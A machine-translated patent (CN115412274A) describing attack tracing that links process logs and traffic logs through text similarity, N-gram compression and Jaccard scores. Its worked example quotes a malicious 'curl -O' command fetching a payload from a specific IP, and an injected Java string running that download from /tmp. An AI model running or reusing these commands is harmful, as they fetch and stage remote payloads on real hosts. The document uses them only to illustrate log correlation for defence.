CN115412274A - Attack tracing method and related data processing and association display method and device - Google Patents

Abstract

The invention discloses an attack tracing method and a related data processing and association display method and device. The processing method of the attack tracing data comprises the following steps: converting at least two different types of attack tracing data generated in the same time period into at least two corresponding texts respectively; comparing the texts corresponding to the at least two parts to determine the similarity between the texts corresponding to the at least two parts; and determining whether the at least two different types of attack tracing data are matched or not according to the similarity. Compared with the prior art, the method adopts a regular expression matching mode, simplifies the matching process, can realize automatic association of mass data, improves the matching efficiency of the attack tracing data, and provides support for faster attack tracing.

Description

Attack source tracing method, related data processing, associated display method and device

technical field

The present invention relates to the technical field of network security, in particular to an attack source tracing method, related data processing, and associated display method and device.

Background technique

Attack source tracing is one of the important methods for post-event response in network security incidents, that is, by correlating and analyzing data related to attack source tracing, such as user threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, and threat intelligence, An attack traceability map is formed to restore the attacker's attack path and attack method, thereby providing a highly interpretable basis for users to perform vulnerability repair, authenticity verification, root cause analysis, and impact assessment. How to quickly and accurately associate massive alarms with each type of security log over a long period of time is an important challenge for network attack source tracing.

In the construction of the attack traceability map, it is possible to carry out correlation mining between various logs and/or intelligence information, such as the correlation mining of network traffic logs and process logs, which is the key to realizing the traceability of factual data in the host and data at the network layer. At present, the general method of network attack source tracing is implemented based on security rules, that is, the two logs of process logs and network traffic in the same time window directly use regular expressions to match the cmd_line field or uri field in the process log data in plain text and the post_data field in the traffic log. In this method, the matching rules need to be defined one by one by the security engineer in advance, and the matching cannot be performed automatically, and more and more rules will be written. In the case of a large amount of data, rule matching is very laborious; at the same time, complex regular expressions are calculated in the case of massive data. It is very time-consuming; it can only be matched against specific fields of specific logs, and cannot be extended to other scenarios; there will be many edges with weak correlation in rule filtering, resulting in inaccurate matching results.

Contents of the invention

In view of the above problems, the present invention is proposed to provide an attack traceability data processing method, an attack traceability method, and an attack information correlation display method and device that overcome the above problems or at least partially solve the above problems.

In the first aspect, the embodiment of the present invention provides a method for processing attack traceability data, including:

Convert at least two different types of attack traceability data generated within the same period of time into at least two corresponding texts;

comparing the at least two corresponding texts to determine the degree of similarity between the at least two corresponding texts;

According to the similarity, it is determined whether the at least two pieces of attack source tracing data of different categories match.

In one embodiment, before at least two pieces of attack source tracing data of different types generated in the same time period are converted into at least two corresponding texts, the following steps are also included:

According to the length of the preset time window, the attack source tracing data within the same time window is selected from the at least two different types of attack source tracing data.

In one embodiment, at least two corresponding texts are compared to determine the similarity between at least two corresponding texts, including:

Segmenting the at least two corresponding texts according to preset stop word rules to generate word vectors containing multiple words respectively;

Calculate the similarity between the word vectors, and use the similarity between the word vectors as the similarity between the at least two texts.

In one embodiment, calculating the similarity between word vectors specifically includes:

Compress the word vectors separately to obtain compressed word vectors;

Computes the Jaccard similarity between compressed word vectors.

In one embodiment, compressing the word vector includes: using a preset N-Gram segmentation method to re-segment the words in the word vector to obtain compressed word vectors.

In one embodiment, calculating the similarity between word vectors includes:

Calculate the length of discontinuous matching character strings between the word vectors, and use the length of the discontinuous matching character strings as the similarity between the word vectors.

In the second aspect, the embodiment of the present invention provides a method for attack source tracing, including:

Collect at least two different types of attack traceability data generated within the same period of time;

judging whether the at least two pieces of attack source tracing data of different categories match;

If they match, it is determined that there is a relationship between the two pieces of attack source tracing data of different categories;

The step of judging whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned processing method of attack traceability data.

In a third aspect, an embodiment of the present invention provides a method for correlating and displaying attack information, including:

Determine whether at least two pieces of attack traceability data of different types generated in the same time period are related;

If it exists, display the relationship between the different types of attack source data on the attack source graph through a preset association method;

The determination of whether at least two pieces of attack source tracing data of different types generated within the same time period are related is realized by the method of locating the source of attack as described above.

In the fourth aspect, the embodiment of the present invention provides a processing device for attack traceability data, including:

The conversion module is used to convert at least two different types of attack traceability data generated in the same period of time into at least two corresponding texts;

A comparison module, configured to compare at least two corresponding texts and determine the similarity between at least two corresponding texts;

A matching module, configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity.

In the fifth aspect, the embodiment of the present invention provides an attack source tracing device, including:

The collection module is used to collect at least two different types of attack traceability data generated within the same time period;

A judging module, configured to judge whether the at least two pieces of attack source tracing data of different categories match;

An association module, configured to determine that there is an association between the two pieces of attack source tracing data of different categories if the judging module judges that they match;

The judging whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned processing method of attack traceability data.

In a sixth aspect, an embodiment of the present invention provides an attack information related display device, including:

The determination module is used to determine whether at least two pieces of attack source tracing data of different categories generated within the same time period are related;

The association display module is used to display the association relationship of the different types of attack source data on the attack source diagram through a preset association method when the determination module determines that there is an association;

The determination of whether at least two pieces of attack traceability data of different types generated within the same time period are related is realized by the above-mentioned attack information traceability method.

In the seventh aspect, the embodiment of the present invention provides a server, including: a memory, a processor, and a computer program stored on the memory and operable on the processor. When the processor executes the program, it implements the aforementioned attack source tracing data The processing method, or the method of tracing the source of the attack as described above, or the method of correlating and displaying the attack information as described above.

In an eighth aspect, an embodiment of the present invention provides a computer-readable storage medium, the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method of attack traceability data as described above, or as The aforementioned method of attack source tracing, or the aforementioned method of correlating and displaying attack information.

In the ninth aspect, an embodiment of the present invention provides a computer program product, the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the aforementioned attack source tracing data processing method, or the aforementioned attack source tracing method. method, or the associated display method of attack information as described above.

The beneficial effects of the above-mentioned technical solutions provided by the embodiments of the present invention at least include:

The embodiment of the present invention mines the correlation between attack traceability data based on text similarity, converts at least two pieces of attack traceability data of different types generated in the same time period into corresponding texts, and then compares the texts Similarity, through the similarity between at least two texts, determine whether there is a match between at least two different types of attack traceability data, and convert the correlation of logs in the same time range into comparing the similarity of two texts, or The problem of how many co-occurring words is compared with the existing technology uses regular expression matching, which simplifies the matching process, realizes the automatic correlation of massive data, improves the matching efficiency of attack traceability data, and provides faster attack traceability Provided support.

In the embodiment of the present invention, the word vector is obtained by segmenting the text converted from the attack traceability data, and the word vector is compressed, and by calculating the Gerrard similarity of the compressed word vector, it is judged whether there is a match between the attack traceability data Balanced considerations have been made in terms of calculation amount, calculation time, calculation complexity and memory usage. While obtaining accurate matching results, it also ensures the timeliness of attack source tracing. In order to provide timely security warnings, vulnerability repairs, and attack causes Follow-up operations such as analysis and impact assessment provide favorable support.

The attack information association display method provided by the embodiment of the present invention displays the matching attack traceability data of different types in the attack traceability map in a visual manner, which is more conducive to users to use the attack traceability map to identify the attack path more intuitively and quickly , attack methods and other information.

Additional features and advantages of the invention will be set forth in the description which follows, and in part will be apparent from the description, or may be learned by practice of the invention. The objectives and other advantages of the invention may be realized and attained by the structure particularly pointed out in the written description and claims hereof as well as the appended drawings.

The technical solutions of the present invention will be described in further detail below with reference to the accompanying drawings and embodiments.

Description of drawings

The accompanying drawings are used to provide a further understanding of the present invention, and constitute a part of the description, and are used together with the embodiments of the present invention to explain the present invention, and do not constitute a limitation to the present invention. In the attached picture:

FIG. 1 is a flowchart of a processing method for attack traceability data according to an embodiment of the present invention;

Fig. 2 is the flow chart of the example that the process log cmd_line field and the post_data field of flow log are matched according to the embodiment of the present invention;

FIG. 3 is a flow chart of a method for attack source tracing provided by an embodiment of the present invention;

FIG. 4 is a flowchart of a method for correlating and displaying attack information provided by an embodiment of the present invention;

5 is a schematic diagram of an example of an attack traceability map display interface provided by an embodiment of the present invention;

FIG. 6 is a structural block diagram of a processing device for attack traceability data provided by an embodiment of the present invention;

FIG. 7 is a structural block diagram of an attack source tracing device provided by an embodiment of the present invention;

FIG. 8 is a structural block diagram of an apparatus for displaying associations of attack information provided by an embodiment of the present invention.

Detailed ways

Exemplary embodiments of the present disclosure will be described in more detail below with reference to the accompanying drawings. Although exemplary embodiments of the present disclosure are shown in the drawings, it should be understood that the present disclosure may be embodied in various forms and should not be limited by the embodiments set forth herein. Rather, these embodiments are provided for more thorough understanding of the present disclosure and to fully convey the scope of the present disclosure to those skilled in the art.

In order to solve the existing problem of matching plaintext fields in process logs in a regular way in existing attack source tracing, embodiments of the present invention provide a method for processing attack source tracing data, an attack source tracing method, and an associated display method for attack information.

The flowchart of the method for processing attack traceability data provided by the embodiment of the present invention will firstly be described in detail below.

The method for processing attack traceability data provided by the embodiment of the present invention, as shown in FIG. 1 , includes:

S11. Convert at least two pieces of attack traceability data of different types generated in the same time period into at least two corresponding texts;

S12. Comparing at least two corresponding texts to determine the similarity between at least two corresponding texts;

S13. According to the similarity, determine whether at least two pieces of attack source tracing data of different categories match.

The embodiment of the present invention mines the correlation between attack traceability data based on text similarity, converts at least two pieces of attack traceability data of different types generated in the same time period into corresponding texts, and then compares the texts Similarity, through the similarity between at least two texts, determine whether there is a match between at least two different types of attack traceability data, and convert the correlation of logs in the same time range into comparing the similarity of two texts, or The problem of how many co-occurring words is compared with the existing technology uses regular expression matching, which simplifies the matching process, realizes the automatic correlation of massive data, improves the matching efficiency of attack traceability data, and provides faster attack traceability Provided support.

In the embodiment of the present invention, the above-mentioned different types of attack traceability data include, but are not limited to: one or more types of user threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, threat intelligence, etc. information.

Usually, in order to realize attack source tracing, it is necessary to analyze the correlation between the attack source tracing data that occurred in the same time period. In this method, according to the length of the preset time window, the attack source tracing data in the same time window is selected from at least two different types of attack source tracing data for subsequent matching process.

For the attack traceability data, it is continuously generated. In order to realize the timeliness of the attack traceability, the processing method of the attack traceability data provided by the embodiment of the present invention can be carried out continuously. For each analysis, a sliding time window is used. Select the scope of the data to be compared on the input of different types of attack traceability data (generated in real time).

After selecting the range of data to be compared, according to the analysis results, determine whether two or more attack traceability data match and whether there is a relationship between them, and if there is a relationship, immediately notify the user through various methods (such as In this way, the timeliness of attack source traceability analysis can be guaranteed.

The length of the sliding time window determines to a certain extent the length of the attack traceability data that needs to be matched. If the data is too short, the analysis results may be inaccurate, and if the data is too long, the analysis and calculation time will be prolonged. Therefore, according to the actual Computing power and timeliness require a reasonable selection of the length of time to achieve accurate matching and meet the timeliness requirements of attack source tracing.

In one embodiment, in the above step S11, two or more different types of log data can be cleaned, and if necessary, data decoding and other operations can be performed to convert two or more different types of log data into the corresponding text.

In one embodiment, in step S12 above, in order to facilitate text matching, the text can be further generated into word vectors, and the similarity between two texts can be obtained by calculating the similarity between word vectors. Transform the similarity of text into the similarity between word vectors.

The following method can be used to obtain word vectors: the above-mentioned at least two corresponding texts are respectively segmented according to the preset stop word rules, and word vectors containing multiple words are respectively generated;

The stop word rule can be to divide words according to preset separators (such as ") or spaces, such as extracting the characters contained in " as a word, etc. The specific method of word segmentation can refer to the prior art, which will not be detailed here. stated.

For example, the cmd_line field "curl-O http://213.202.230.103/syn" in the process log can obtain the word vector s1=[curl, O, http://213.202.230.103/syn] according to the stop word segmentation.

According to the principle of stop word segmentation above, each character contained in the converted text is extracted to form a word vector.

Considering that the length of the character string contained in the converted text may be very long, if the word vector is directly calculated, the calculation amount may be too large and the calculation time is too long. In the embodiment of the present invention, the word vector can be compressed .

In one embodiment, the present invention can use the preset N-Gram segmentation method to re-segment the words in the word vector to obtain compressed word vectors.

N-Gram refers to a language model that uses the same text segmentation method, that is, multiple fragments (Gram) are generated by multi-level enumeration. The segmentation method is as follows: use a window of length N, from left to Right, slide over the text character by character; each step will frame a string, which is a Gram; all the Grams in the text are the segmentation results of the text.

When enumerating, the order of enumeration can be determined in advance (N is the order of enumeration), and then enumerate one by one according to the preset order to obtain the corresponding segmentation results.

Taking the cmd_line field "curl–O http://213.202.230.103/syn" as an example, the results of word vectors obtained by segmentation are as follows:

Table 1

From the above example, it can be seen that if the value of N is too small, the number of fragments contained is too large, the length of a single fragment is too small, the amount of calculation is relatively large, it takes a long time, and the matching accuracy is low, and if N If the value of N is too large, there will also be problems of greater memory consumption and sparse features, and the accuracy of matching will also be reduced. Therefore, an appropriate value of N can be selected according to the actual situation to realize the calculation amount and calculation consumption. Balance between time, memory consumption, accuracy, etc.

In one embodiment, the word vectors obtained after the above-mentioned word vector compression can be used to calculate the Jaccard similarity between the compressed word components as the final calculation result.

Of course, the embodiment of the present invention is not limited to using the Jaccard similarity to realize the calculation of the similarity between word vectors, and other methods that can realize the similarity calculation are all available.

Jaccard similarity, the similarity coefficient is mainly used to calculate the similarity between samples measured by symbols or Boolean values. If the feature attributes between samples are identified by symbols and Boolean values, it is impossible to measure the size of the specific value of the difference, and only the result of "whether they are the same" can be obtained, while the Jaccard similarity is concerned with the common characteristics between samples.

In the embodiment of the present invention, the reasons why Jaccard similarity is used to evaluate word vector similarity include: 1) Jaccard similarity calculation is simple and time complexity is low; (2) the similarity result is affected by the field length , the result of a relatively long field tends to be more accurate; this is the same as the number of words in the embodiment of the present invention, the greater the length of the attack traceability data, the more feasible the similarity value is (that is, the matching The more accurate the result), the characteristics match.

The general expression of Jaccard is as follows:

Assuming two sets A and B, then the Jaccard similarity between the two is:

In the above formula, len(A and B) is the length of the intersection of A and B, and len(A or B) is the length of the union of A and B.

Jaccard similarity, which is the proportion of co-occurring words between sets.

In combination with the aforementioned steps of word vector compression, after the step of word vector compression, the embodiment of the present invention can use the following formula to calculate the similarity value between different compressed word vectors:

The above S1' and S2' are two compressed word vectors for which the similarity is to be calculated, and len(S1') and len(S2') are the lengths of the compressed word vectors S1' and S2' respectively.

If there are multiple word vectors (or compressed word vectors) that need to be calculated for similarity (more than 2), you can use pairwise matching to calculate two word vectors (or compressed word vectors) Vector) Jaccard similarity value to determine whether they match.

After the Jaccard similarity value is calculated, it can be compared with the preset similarity threshold. If it is greater than the preset similarity threshold, it is determined that there is a matching relationship between the attack traceability data corresponding to the word vector.

If the Jaccard similarity calculation method is not used, a simplified algorithm based on dynamic programming-based co-occurrence word similarity comparison can also be used.

This simplified algorithm binds each word obtained after the word vector is divided into stop words as a character, so that s1"=x='[curl O http://213.202.230.103/syn]', xi is the i-th item of x , such as x0='curl'.

Similarly, s2"=y='...0022cur lOhttp://213.202.230.103/syn,...', yj is the jth item of y.

To construct a matrix C, the matrix has i rows and j columns. It is necessary to calculate the length of the discontinuous matching character substrings of string x and string y. The dynamic programming formula is:

The longer the value length of C[i][j], the longer the matched similarity text, and the greater the similarity between word vectors.

To simplify the calculation, you can directly check whether the value of the element with the maximum value of i and j in the matrix is greater than the preset threshold, and if so, determine the match between the word vectors.

The following uses the comparison between the cmd_line field of the process log and the post_data field of the traffic log as an example to illustrate the processing method for the above-mentioned attack source tracing data provided by the embodiment of the present invention.

The processing procedure of this example, with reference to shown in Figure 2, comprises the following steps:

Step S21, determine the length of the sliding window, that is, the time length range, input process log data and network flow data, and select the data to be compared from the input process log cmd_line field and the post_data field of the flow log by designing the length of the time window range, the length of the time window is limited to 180ms:

Step S22, performing data cleaning and word vector construction on the selected data. The post_data data is processed by url decoding (url decode), and the cmd_line field and post_data field to be compared are divided according to appropriate stop word rules. For example, the following regular expressions are used for stop word segmentation:

[x for x in re.sub(r'[^A-Za-z0-9_.]',",str1).split(")if x! ="]

Through stop word segmentation, a text can be divided into a series of "words" in order, for example, the cmd_line field "curl-Ohttp://213.202.230.103/syn" After word segmentation according to the stop word segmentation rules, the word vector s1=[ curl,O,http://213.202.230.103/syn]; post_data field "...+var+cmd+＝+new+java.lang.String(\u0022cd+/tmp;curl+O+http://213.202. 230.103/syn..." After performing word segmentation according to the stop word segmentation rule, the word vector s2=[...,0022,curl,O,http://213.202.230.103/syn,...] can be obtained.

Step S23, compressing the word vector;

Use 2-gram to compress s1 and s2 to obtain compressed word vectors s1' and s2' respectively.

The word vector of the cmd_line field becomes s1'=[curlO, Ohttp://213.202.230.103/syn] after compression;

The word vector of the post_line field becomes s2'=[...0022,0022curl,curlO,Ohttp://213.202.230.103/syn,http://213.202.230.103/syn...].

Step S24, calculating the similarity of the compressed word vectors.

公式来计算杰卡德相似度。计算过程在此不再详述。according to

Formula to calculate Jaccard similarity. The calculation process will not be described in detail here.

Step S25, comparing the similarity of the compressed word vector with a preset similarity threshold;

Step S26, if the comparison result of step S25 is greater than, then determine that the cmd_line field of the process log matches the data range to be compared in the post_data field of the traffic log, that is, there is a relationship between the two within the selected time period.

Based on the same inventive concept, the embodiment of the present invention also provides a method for attack source tracing, as shown in Figure 3, including the following steps:

S31. Collect at least two pieces of attack source tracing data of different types generated within the same time period;

S32. Determine whether the at least two pieces of attack source tracing data of different categories match; if they match, perform the following step S33;

S33. Determine that there is a relationship between the two pieces of attack source tracing data of different categories.

The above steps of judging whether at least two pieces of attack source tracing data of different types match are realized through the aforementioned processing method of attack source tracing data.

The attack traceability method provided by the embodiment of the present invention can judge that there is a correlation between the attack traceability data according to the matching relationship between the aforementioned attack traceability data, in order to further perform vulnerability repair, authenticity verification, attack root cause analysis, Impact assessments provide support.

In order to more intuitively display the relevance of the above-mentioned attack source tracing information, an embodiment of the present invention also provides a method for displaying the association of attack information, as shown in Figure 4, including:

S41. Determine whether at least two pieces of attack traceability data of different types generated within the same time period are related; if yes, execute S42;

S42. On the attack traceability map, display the association relationship of the different types of attack traceability data in a preset association manner;

The above determination of whether at least two different types of attack traceability data generated within the same period of time are related is achieved through the method of attack traceability as described in the foregoing embodiment (as shown in Figure 4), and the specific implementation process is here No longer.

An example of an attack traceability graph display interface is shown in Figure 5.

As shown in Figure 5, between cmd.exe (the node represented by the process log) and HTTP (the node represented by the network traffic log), the above method is performed within a certain period of time to determine that there is an association between the two, and then the two Connected by lines and arrows, users can click one of the nodes to view relevant details, such as log time, node type, name (HTTP), source IP, source port, destination IP, destination port, attack method, etc. .

Based on the same inventive concept, the embodiment of the present invention also provides a processing device for attack traceability data, an attack traceability device, and an associated display device for attack information. The method of attack source tracing is similar to the method of correlating display of attack information, so the implementation of the device can refer to the implementation of the aforementioned method, and the repetition will not be repeated.

An embodiment of the present invention provides a processing device for attack traceability data, as shown in FIG. 6 , including:

A conversion module 61, configured to convert at least two pieces of attack source tracing data of different types generated within the same time period into at least two corresponding texts respectively;

A comparison module 62, configured to compare at least two corresponding texts to determine the similarity between at least two corresponding texts;

The matching module 63 is configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity.

An embodiment of the present invention provides an attack source tracing device, as shown in Figure 7, including:

A collection module 71, configured to collect at least two pieces of attack traceability data of different types generated within the same time period;

A judging module 72, configured to judge whether the at least two pieces of attack source tracing data of different categories match;

An association module 73, configured to determine that there is an association between the two pieces of attack source tracing data of different types if the judging module judges that they match;

The above determination of whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned attack traceability data processing method.

An attack information related display device provided by an embodiment of the present invention, as shown in FIG. 8 , includes:

A determining module 81, configured to determine whether at least two pieces of attack source tracing data of different types generated within the same time period are related;

The association display module 82 is configured to display the association relationship of the different types of attack source data on the attack source diagram through a preset association method when the determination module determines that there is an association;

The determination of whether at least two pieces of attack traceability data of different types generated within the same time period are related is realized by the traceability method of attack information as described in the foregoing embodiment (as shown in FIG. 4 ).

An embodiment of the present invention provides a server, including: a memory, a processor, and a computer program stored on the memory and operable on the processor. When the processor executes the program, it implements the processing method of the aforementioned attack traceability data. , or the aforementioned method of attack source tracing, or the aforementioned method of correlating and displaying attack information.

An embodiment of the present invention provides a computer-readable storage medium, the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method of the aforementioned attack source tracing data, or the aforementioned attack source tracing method method, or the associated display method of attack information as described above.

An embodiment of the present invention provides a computer program product, the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the aforementioned attack source tracing data processing method, or the aforementioned attack source tracing method, or such as The method for displaying the association of the aforementioned attack information.

With regard to the processing device for attack source data, the device for attack source tracing, and the associated display device for attack information in the above-mentioned embodiments, the specific ways in which each module performs operations have been described in detail in the embodiments of the method. Here, No detailed explanation is given.

Those skilled in the art should understand that the embodiments of the present invention may be provided as methods, systems, or computer program products. Accordingly, the present invention can take the form of an entirely hardware embodiment, an entirely software embodiment, or an embodiment combining software and hardware aspects. Furthermore, the present invention may take the form of a computer program product embodied on one or more computer-usable storage media (including but not limited to disk storage and optical storage, etc.) having computer-usable program code embodied therein.

The present invention is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the invention. It should be understood that each procedure and/or block in the flowchart and/or block diagram, and a combination of procedures and/or blocks in the flowchart and/or block diagram can be realized by computer program instructions. These computer program instructions may be provided to a general purpose computer, special purpose computer, embedded processor, or processor of other programmable data processing equipment to produce a machine such that the instructions executed by the processor of the computer or other programmable data processing equipment produce a An apparatus for realizing the functions specified in one or more procedures of the flowchart and/or one or more blocks of the block diagram.

These computer program instructions may also be stored in a computer-readable memory capable of directing a computer or other programmable data processing apparatus to operate in a specific manner, such that the instructions stored in the computer-readable memory produce an article of manufacture comprising instruction means, the instructions The device realizes the function specified in one or more procedures of the flowchart and/or one or more blocks of the block diagram.

These computer program instructions can also be loaded onto a computer or other programmable data processing device, causing a series of operational steps to be performed on the computer or other programmable device to produce a computer-implemented process, thereby The instructions provide steps for implementing the functions specified in the flow chart or blocks of the flowchart and/or the block or blocks of the block diagrams.

Obviously, those skilled in the art can make various changes and modifications to the present invention without departing from the spirit and scope of the present invention. Thus, if these modifications and variations of the present invention fall within the scope of the claims of the present invention and their equivalent technologies, the present invention also intends to include these modifications and variations.

Claims (13)

1. A method for processing attack traceability data, comprising: Convert at least two different types of attack traceability data generated within the same period of time into at least two corresponding texts; comparing the at least two corresponding texts to determine the degree of similarity between the at least two corresponding texts; According to the similarity, it is determined whether the at least two pieces of attack source tracing data of different categories match. 2. The method according to claim 1, characterized in that, before converting at least two pieces of attack traceability data of different types generated within the same period of time into at least two corresponding texts, further comprising: According to the length of the preset time window, the attack source tracing data within the same time window is selected from the at least two different types of attack source tracing data. 3. The method according to claim 1, wherein at least two corresponding texts are compared to determine the degree of similarity between at least two corresponding texts, comprising: Segmenting the at least two corresponding texts according to preset stop word rules to generate word vectors containing multiple words respectively; Calculate the similarity between the word vectors, and use the similarity between the word vectors as the similarity between the at least two texts. 4. The method according to claim 3, wherein calculating the similarity between word vectors comprises: Compress the word vectors separately to obtain compressed word vectors; Computes the Jaccard similarity between compressed word vectors. 5. The method according to claim 4, wherein the word vector is compressed to obtain the compressed word vector, comprising: Use the preset N-Gram segmentation method to re-segment the words in the word vector to obtain the compressed word vector. 6. The method according to claim 3, wherein calculating the similarity between word vectors comprises: Calculate the length of discontinuous matching character strings between the word vectors, and use the length of the discontinuous matching character strings as the similarity between the word vectors. 7. A method for tracing the source of an attack, comprising: Collect at least two different types of attack traceability data generated within the same period of time; judging whether the at least two pieces of attack source tracing data of different categories match; If they match, it is determined that there is a relationship between the two pieces of attack source tracing data of different categories; The step of judging whether the at least two pieces of attack traceability data of different types match is realized by the method for processing attack traceability data according to any one of claims 1-6. 8. A method for correlating and displaying attack information, comprising: Determine whether at least two pieces of attack traceability data of different types generated in the same time period are related; If it exists, display the relationship between the different types of attack source data on the attack source graph through a preset association method; The step of determining whether at least two pieces of attack source tracing data of different types generated in the same time period are related is realized by the attack source tracing method as claimed in claim 7 . 9. A processing device for attack traceability data, characterized in that it includes: The conversion module is used to convert at least two different types of attack traceability data generated in the same period of time into at least two corresponding texts; A comparison module, configured to compare at least two corresponding texts and determine the similarity between at least two corresponding texts; A matching module, configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity. 10. An attack source tracing device, comprising: The collection module is used to collect at least two different types of attack traceability data generated within the same time period; A judging module, configured to judge whether the at least two pieces of attack source tracing data of different categories match; An association module, configured to determine that there is an association between the two pieces of attack traceability data of different categories if the judging module judges that they match; The judging whether the at least two pieces of attack traceability data of different types match is realized by the processing method of attack traceability data according to any one of claims 1-6. 11. A server, characterized in that it comprises: a memory, a processor, and a computer program stored on the memory and operable on the processor, when the processor executes the program, it implements attack source tracing according to claims 1-6 The data processing method, or the attack source tracing method according to claim 7, or the attack information association display method according to claim 8. 12. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method for attacking traceability data according to claims 1-6, or The attack source tracing method according to claim 7, or the attack information association display method according to claim 8. 13. A computer program product, characterized in that the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the processing method for attacking traceability data according to claims 1-6, or as claimed in claim 7 The attack source tracing method described above, or the attack information association display method described in claim 8.

Images